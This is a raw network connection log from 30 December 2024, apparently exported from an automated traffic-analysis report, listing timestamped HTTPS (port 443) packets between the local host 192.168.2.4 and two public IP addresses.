                                                                                                                                                                                    Dec 30, 2024 11:52:00.647543907 CET44352037142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.821820021 CET44352032142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.821882963 CET52032443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.823193073 CET44352032142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.823227882 CET52032443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.823252916 CET44352032142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.823295116 CET52032443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.824194908 CET52032443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.824218035 CET44352032142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.824228048 CET52032443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.824266911 CET52032443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.825095892 CET52044443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.825131893 CET44352044142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.825376987 CET52044443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.825902939 CET52044443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.825913906 CET44352044142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.838849068 CET44352034142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.838912010 CET52034443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.838922977 CET44352034142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.838979006 CET52034443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.839426994 CET52034443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.839464903 CET44352034142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.839504004 CET52034443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.839914083 CET52045443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.839950085 CET44352045142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.840174913 CET52045443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.840378046 CET52045443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:00.840393066 CET44352045142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.883374929 CET44352035142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.883543968 CET44352035142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.883550882 CET52035443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.883574963 CET44352035142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.883591890 CET52035443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.883618116 CET52035443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.883735895 CET44352035142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.883784056 CET52035443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.883815050 CET44352035142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.883852005 CET52035443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.883927107 CET44352035142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.884018898 CET52035443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.891940117 CET52035443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.891949892 CET44352035142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.892592907 CET52047443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.892637014 CET44352047142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.892724991 CET52047443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.892983913 CET52047443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.892996073 CET44352047142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.998255968 CET44352037142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.998301983 CET44352037142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.998316050 CET52037443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.998332977 CET44352037142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.998354912 CET52037443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.998382092 CET52037443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.998406887 CET44352037142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.998440027 CET52037443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.998444080 CET44352037142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.998477936 CET52037443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.998501062 CET44352037142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:00.998558044 CET52037443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.999243021 CET52037443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:00.999255896 CET44352037142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.000052929 CET52048443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:01.000103951 CET44352048142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.000163078 CET52048443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:01.000376940 CET52048443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:01.000391960 CET44352048142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.424788952 CET44352044142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.424885988 CET52044443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.425921917 CET44352044142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.426073074 CET52044443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.428159952 CET52044443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.428169012 CET44352044142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.428561926 CET44352044142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.428625107 CET52044443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.429023027 CET52044443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.443833113 CET44352045142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.443924904 CET52045443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.444621086 CET44352045142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.444681883 CET52045443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.447166920 CET52045443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.447182894 CET44352045142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.447468042 CET44352045142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.447532892 CET52045443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.447998047 CET52045443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.475323915 CET44352044142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.495333910 CET44352045142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.515013933 CET44352047142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.515085936 CET52047443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:01.515474081 CET52047443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:01.515490055 CET44352047142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.517198086 CET52047443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:01.517218113 CET44352047142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.598594904 CET44352048142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.598656893 CET52048443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:01.599234104 CET52048443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:01.599256039 CET44352048142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.599304914 CET52048443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:01.599311113 CET44352048142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.789479971 CET52044443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.789519072 CET52045443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.789577961 CET52047443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:01.789639950 CET52048443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:01.792228937 CET52056443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.792265892 CET44352056142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.792828083 CET52056443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.793540955 CET52056443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.793553114 CET52057443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.793555021 CET44352056142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.793593884 CET44352057142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:01.793689966 CET52057443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.793912888 CET52057443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:01.793921947 CET44352057142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.403546095 CET44352056142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.403626919 CET52056443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.404681921 CET52056443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.404694080 CET44352056142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.405229092 CET44352057142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.405411959 CET52057443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.405806065 CET52057443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.405813932 CET44352057142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.406415939 CET52056443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.406425953 CET44352056142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.407380104 CET52057443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.407385111 CET44352057142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.774179935 CET44352057142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.774823904 CET52057443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.775485992 CET44352057142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.775532961 CET52057443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.775533915 CET44352057142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.775583029 CET52057443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.784992933 CET44352056142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.785119057 CET52056443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.785146952 CET44352056142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.785305023 CET52056443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.785948038 CET44352056142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.785998106 CET44352056142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.786019087 CET52056443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.786037922 CET52056443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.787168026 CET52057443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.787189960 CET44352057142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.787200928 CET52057443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.787281990 CET52057443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.788054943 CET52063443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.788099051 CET44352063142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.788204908 CET52063443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.790647030 CET52056443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.790668011 CET44352056142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.791378975 CET52064443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.791404009 CET44352064142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.791491032 CET52064443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.792077065 CET52064443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.792092085 CET44352064142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.795463085 CET52063443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:02.795495033 CET44352063142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.798583031 CET52065443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:02.798608065 CET44352065142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.798657894 CET52065443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:02.799362898 CET52065443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:02.799379110 CET44352065142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.844412088 CET52068443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:02.844463110 CET44352068142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:02.844535112 CET52068443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:02.848464012 CET52068443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:02.848484039 CET44352068142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.395838022 CET44352063142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.396713972 CET44352064142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.396795034 CET52063443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.397653103 CET52064443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.402264118 CET44352065142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.405692101 CET52065443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.412410021 CET52063443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.412431955 CET44352063142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.412785053 CET52063443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.412792921 CET44352063142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.413234949 CET52064443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.413242102 CET44352064142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.413453102 CET52064443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.413456917 CET44352064142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.428349972 CET52065443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.428371906 CET44352065142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.432868004 CET52065443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.432877064 CET44352065142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.456646919 CET44352068142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.456732988 CET52068443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.457376003 CET52068443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.457386017 CET44352068142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.457782030 CET52068443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.457787991 CET44352068142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.768647909 CET44352064142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.768729925 CET52064443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.768938065 CET52064443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.768996954 CET44352064142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.769053936 CET52064443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.769618034 CET52077443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.769661903 CET44352077142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.769792080 CET52077443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.770077944 CET52077443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.770088911 CET44352077142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.772129059 CET44352063142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.772193909 CET52063443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.772213936 CET44352063142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.772254944 CET52063443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.772286892 CET52063443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.772325039 CET44352063142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.772474051 CET44352063142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.772517920 CET52063443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.772533894 CET52063443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.772739887 CET52078443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.772790909 CET44352078142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.772856951 CET52078443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.773068905 CET52078443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:03.773083925 CET44352078142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.808747053 CET44352065142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.808794022 CET44352065142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.808837891 CET52065443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.808864117 CET44352065142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.808876991 CET52065443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.808912039 CET52065443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.808917046 CET44352065142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.808990002 CET52065443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.809698105 CET52065443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.809710979 CET44352065142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.809720993 CET52065443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.809878111 CET52065443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.810437918 CET52080443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.810530901 CET44352080142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.810638905 CET52080443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.810962915 CET52080443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.810995102 CET44352080142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.988642931 CET44352068142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.988684893 CET44352068142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.988748074 CET52068443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.988749027 CET52068443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.988781929 CET44352068142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.988831043 CET52068443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.989542007 CET52068443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.989557028 CET44352068142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.990009069 CET52082443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.990046978 CET44352082142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.990104914 CET52082443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.990439892 CET52082443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:03.990453959 CET44352082142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.542617083 CET44352080142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.542670965 CET52080443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:04.543798923 CET44352078142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.543878078 CET52078443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.543895006 CET44352077142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.543947935 CET52077443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.544023037 CET52080443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:04.544047117 CET44352080142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.544234991 CET52080443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:04.544243097 CET44352080142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.544578075 CET44352078142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.544632912 CET52078443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.544723034 CET44352077142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.544765949 CET52077443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.547947884 CET52078443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.547967911 CET44352078142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.548273087 CET44352078142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.548322916 CET52078443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.548356056 CET52077443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.548374891 CET44352077142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.548661947 CET44352077142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.548815012 CET52077443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.548871040 CET52078443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.549232006 CET52077443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.595334053 CET44352077142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.595335960 CET44352078142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.597764015 CET44352082142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.597839117 CET52082443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:04.598210096 CET52082443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:04.598222017 CET44352082142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.598401070 CET52082443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:04.598408937 CET44352082142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.839637041 CET44352078142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.839755058 CET52078443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.840225935 CET52078443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.840270996 CET44352078142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.840399981 CET52078443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.841187000 CET52088443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.841233015 CET44352088142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.841538906 CET52088443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.841538906 CET52088443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.841569901 CET44352088142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.856434107 CET44352077142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.856688023 CET52077443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:04.856712103 CET44352077142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:04.857551098 CET44352077142.250.181.238192.168.2.4
